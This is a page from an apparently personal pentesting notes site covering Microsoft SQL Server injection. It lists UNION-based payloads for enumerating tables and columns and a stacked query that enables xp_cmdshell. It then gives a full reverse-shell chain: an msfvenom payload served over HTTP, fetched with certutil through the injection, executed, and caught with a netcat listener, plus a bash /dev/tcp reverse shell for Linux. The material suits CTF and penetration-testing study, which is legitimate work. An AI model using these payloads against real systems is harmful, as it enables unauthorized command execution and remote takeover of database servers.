# Disboard #
  • Reconnaissance
    • Quick Guide
    • Ports and Protocols
    • Passive Reconnaissance
    • Active Reconnaissance
  • Enumeration
    • Password Cracking
    • Hydra
    • Wireshark
    • Snort
    • Steganography
  • Web
    • OWASP Top 10
    • OWASP API
    • SQL Injection
      • Microsoft SQL Injection
    • Cross Site Scripting
    • Browser Vulnerabilities
    • Fuzzing
  • Linux
    • Privilege Escalation
    • Docker
    • Program Life Cycle
  • Windows
    • Privilege Escalation
    • Active Directory
    • Powershell
  • Event Logs
    • Sysmon
  • Exploitation
    • Shells
      • Upgrading Shells
    • Metasploit
      • Meterpreter
    • KOTH
    • Source Code Review
  • Hack the Box
    • ARCHETYPE
    • BASE
    • BASHED
    • EXPLORE
    • NIBBLES
  • Try Hack Me
    • ADVENTURE TIME
    • HACKFINITY
    • MOTHER'S SECRET
    • OFFSEC
    • POSTEXPLOIT
    • ROASTED
    • TEMPEST
    • TRAVERSE
  • CompTIA
    • Network
      • 1.0 Networking Fundamentals
      • 2.0 Network Implementations
      • 3.0 Network Operations
      • 4.0 Network Security
      • 5.0 Network Troubleshooting
    • PenTest
  • SIEM
    • Splunk
    • Elastic
  • Wireless
    • Wi-Fi Hacking
  • Other
    • PicoCTF
    • SSH Tunneling
    • Life Hacks
    • My Pokémon API
    • Github
Powered by GitBook
On this page
  • Basic Commands
  • Getting Shell
  • Setting up a reverse shell
  1. Web
  2. SQL Injection

Microsoft SQL Injection

List of commands

Basic Commands

  • ?param=' OR 1=1--

  • ?param=' OR 1=2--

  • ?param=' ORDER BY 1,null,3,4--

  • TABLE NAME: ?param=' UNION SELECT table_name FROM information_schema.tables--

  • COLUMN NAME: ?param=' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table1'--

  • MODIFIED UNION: ?param=' UnIoN SELECT key1, key2, key3 FROM table1--

  • NEXT

Getting Shell

Using xp_cmdshell: This is a system-extended stored procedure in Microsoft SQL Server that enables the execution of operating system commands and programs from within the SQL Server. It provides a mechanism for SQL Server to interact directly with the host operating system's command shell. By default, it is disabled on production servers, however it is possible to enable xp_cmdshell in SQL Server through EXECUTE queries if the database user is a member of the sysadmin group or has the "ALTER SETTINGS" permission.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Injection command to turn on xp_cmdshell: ?param='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

Setting up a reverse shell

On Windows:

  1. Use MSFvenom to generate a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o reverse.exe

  2. Set up a simple http server to host reverse shell: python3 -m http.server 8080

  3. Injection command to fetch reverse shell: ?param='; EXEC xp_cmdshell 'certutil -urlcache -f http://$IP:8080/reverse.exe C:\Windows\Temp\reverse.exe'; --

  4. Listener on attack machine: nc -nvlp 4444

  5. Injection to execute reverse shell: ?param='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe';--

On Linux:

  1. Listener on attack machine: nc -nvlp 1337

  2. Injection to execute reverse shell: ?param='; EXEC xp_cmdshell '/bin/bash -i >& /dev/tcp/$IP/1337 0>&1

PreviousSQL InjectionNextCross Site Scripting

Last updated 1 year ago